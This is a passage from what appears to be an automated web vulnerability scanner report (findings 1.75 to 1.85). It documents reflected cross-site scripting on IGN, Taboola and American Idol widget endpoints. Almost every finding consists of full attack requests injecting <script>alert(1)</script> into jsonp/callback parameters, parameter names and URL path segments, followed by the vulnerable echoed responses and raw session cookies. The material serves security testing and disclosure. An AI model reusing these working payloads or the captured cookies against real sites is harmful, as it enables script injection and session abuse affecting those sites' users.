Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-02.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 1541
Date: Tue, 04 Oct 2011 20:10:05 GMT

jsonp13177588132575b910<script>alert(1)</script>c36337bda10({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"Beverly Hills","settings":{"notifyOnWallPostReceived":"true","notifyOnFollowerReceived":"false","notifyOnLevelEarned":"false"},"type":"
...[SNIP]...

1.75. http://social-services.ign.com/v1.0/social/rest/people/fedreg.233293577/@self [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social-services.ign.com
Path:   /v1.0/social/rest/people/fedreg.233293577/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload f8a1e<script>alert(1)</script>bc7f5a60105 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.233293577/@self?jsonp=jsonp1317758813258f8a1e<script>alert(1)</script>bc7f5a60105&_=1317758816915 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-03.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 1291
Date: Tue, 04 Oct 2011 20:10:05 GMT

jsonp1317758813258f8a1e<script>alert(1)</script>bc7f5a60105({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"Hollywood, CA","settings":{"notifyOnWallPostReceived":"true","notifyOnFollowerReceived":"true","notifyOnLevelEarned":"true"},"type":"St
...[SNIP]...

1.76. http://social-services.ign.com/v1.0/social/rest/people/fedreg.259795679/@self [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social-services.ign.com
Path:   /v1.0/social/rest/people/fedreg.259795679/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 61ce5<script>alert(1)</script>09d15fd1a01 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.259795679/@self?jsonp=jsonp131775881325661ce5<script>alert(1)</script>09d15fd1a01&_=1317758816914 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-02.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 1931
Date: Tue, 04 Oct 2011 20:10:09 GMT

jsonp131775881325661ce5<script>alert(1)</script>09d15fd1a01({"startIndex":0,"count":1,"totalResults":1,"entry":[{"settings":{"notifyOnWallPostReceived":"true","notifyOnReviewCommentReceived":"true","notifyOnBlogCommentReceived":"true","notifyOnFollowerReceived
...[SNIP]...

1.77. http://social-services.ign.com/v1.0/social/rest/people/fedreg.78864510/@self [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social-services.ign.com
Path:   /v1.0/social/rest/people/fedreg.78864510/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 47838<script>alert(1)</script>c6cbbc461de was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.78864510/@self?jsonp=jsonp131775881325547838<script>alert(1)</script>c6cbbc461de&_=1317758816913 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-04.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 2287
Date: Tue, 04 Oct 2011 20:10:05 GMT

jsonp131775881325547838<script>alert(1)</script>c6cbbc461de({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"San Francisco","settings":{"notifyOnWallPostReceived":"false","notifyOnFollowerReceived":"false","notifyOnLevelEarned":"false"},"type":
...[SNIP]...

1.78. http://social-services.ign.com/v1.0/social/rest/people/nickname.Interoceter%20/@self [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social-services.ign.com
Path:   /v1.0/social/rest/people/nickname.Interoceter%20/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3f36f<script>alert(1)</script>a1470682ff0 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/nickname.Interoceter%20/@self?jsonp=jsonp13177588132543f36f<script>alert(1)</script>a1470682ff0&_=1317758816912 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-01.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 2183
Date: Tue, 04 Oct 2011 20:10:03 GMT

jsonp13177588132543f36f<script>alert(1)</script>a1470682ff0({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"Sector 7G","settings":{"notifyOnWallPostReceived":"true","notifyOnFollowerReceived":"true","notifyOnLevelEarned":"true"},"type":"Standa
...[SNIP]...

1.79. http://support.igninsider.com/ics/support/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.igninsider.com
Path:   /ics/support/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64259"><script>alert(1)</script>720bddf44f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ics/support/default.asp?deptID=3233&64259"><script>alert(1)</script>720bddf44f0=1 HTTP/1.1
Host: support.igninsider.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://support.igninsider.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 04 Oct 2011 22:06:22 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ParaturePortalSessionID=adaaa4e5%2D1241%2D4dd7%2D94cb%2De8cd8f657c71; path=/
Set-Cookie: ParaturePortalDeptID=3233; path=/
Vary: Accept-Encoding
Content-Length: 4128


<HTML>
<HEAD>
<!-- ****** PRODAPP6-A ****** -->
<base href="http://support.igninsider.com/ics/support/" />
<!--<script src="../ic1Browser.js"></script>-->
<script type="text/javascript" src="/i
...[SNIP]...
<frame title="Left Navigation" name="cypLeft" src="KBFolder.asp?deptID=3233&64259"><script>alert(1)</script>720bddf44f0=1" marginheight=0 marginwidth=0 scrolling=auto>
...[SNIP]...

1.80. http://trc.taboolasyndication.com/ign-askmen/trc/2/json [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /ign-askmen/trc/2/json

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 94d18<script>alert(1)</script>d13c2880044 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ign-askmen/trc/2/json?tim=15%3A09%3A48.950&publisher=ign-askmen&pv=2&list-size=8&list-id=rbox-t2v&id=207&uim=article-horizontal&intent=u&uip=article-horizontal&external=http%3A%2F%2Fwww.askmen.com%2F&llvl=1&item-id=http%3A%2F%2Faskmen.com%2Ftop_10%2Fcars%2Ffastest-cars-in-the-world.html&item-type=text&item-url=http%3A%2F%2Faskmen.com%2Ftop_10%2Fcars%2Ffastest-cars-in-the-world.html&page-id=510356a1b27a2568a0a5b8d38eba109bc67661b8&cv=4-9-8-49662-3734132&uiv=default&cb=TRC.callbacks.recommendations_194d18<script>alert(1)</script>d13c2880044 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Tue, 04 Oct 2011 20:31:49 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_1b0243f9d09f45382ea41ba6067243cc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1317760243_1317760309;Path=/ign-askmen/
Set-Cookie: JSESSIONID=.prod2-f2;Path=/
Set-Cookie: taboola_wv=;Path=/ign-askmen/;Expires=Wed, 03-Oct-12 20:31:49 GMT
Content-Length: 4358

TRC.callbacks.recommendations_194d18<script>alert(1)</script>d13c2880044({"trc":{"req":"e56e6f775f9c2e0da624f1b80e049cb8","session-id":"1b0243f9d09f45382ea41ba6067243cc","session-data":"v1_1b0243f9d09f45382ea41ba6067243cc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1317760243_131
...[SNIP]...

1.81. http://widgets.ign.com/disqus/comment/comment/ign-articles/1197949.jsonp [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.ign.com
Path:   /disqus/comment/comment/ign-articles/1197949.jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4c39a<script>alert(1)</script>cd50f099a7e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /disqus/comment/comment/ign-articles/1197949.jsonp?category=xboxlive&url=http%3A%2F%2Fxboxlive.ign.com%2Farticles%2F119%2F1197949p1.html&title=The+Top+25+Xbox+Live+Arcade+Games&callback=jsonp13177659042454c39a<script>alert(1)</script>cd50f099a7e&_=1317765942525 HTTP/1.1
Host: widgets.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; rsi_segs=; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 2976
Accept-Ranges: bytes
X-Varnish: 1916941308
Expires: Tue, 04 Oct 2011 22:05:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 22:05:16 GMT
Connection: close

jsonp13177659042454c39a<script>alert(1)</script>cd50f099a7e("<script type=\"text\/javascript\">var cssNode = document.createElement('link');cssNode.type = 'text\/css';cssNode.rel = 'stylesheet';cssNod
...[SNIP]...

1.82. http://widgets.ign.com/global/page/followus.jsonp [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.ign.com
Path:   /global/page/followus.jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 844f6<script>alert(1)</script>5e7756dfe2d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /global/page/followus.jsonp?locale=us&layout=right_rail&callback=jsonp1317765904246844f6<script>alert(1)</script>5e7756dfe2d&_=1317765951425 HTTP/1.1
Host: widgets.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1769
Accept-Ranges: bytes
X-Varnish: 1916941921
Expires: Tue, 04 Oct 2011 22:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 22:05:20 GMT
Connection: close

jsonp1317765904246844f6<script>alert(1)</script>5e7756dfe2d("<script type=\"text\/javascript\">var cssNode = document.createElement('link');cssNode.type = 'text\/css';cssNode.rel = 'stylesheet';cssNod
...[SNIP]...

1.83. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90673'><script>alert(1)</script>58610e30d1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js90673'><script>alert(1)</script>58610e30d1f/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:15 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js90673'><script>alert(1)</script>58610e30d1f/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=13177
...[SNIP]...

1.84. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7dd22'><script>alert(1)</script>127ff36c659 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity7dd22'><script>alert(1)</script>127ff36c659/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:17 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity7dd22'><script>alert(1)</script>127ff36c659/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.85. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97b0e'><script>alert(1)</script>6b191eb13af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view97b0e'><script>alert(1)</script>6b191eb13af?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
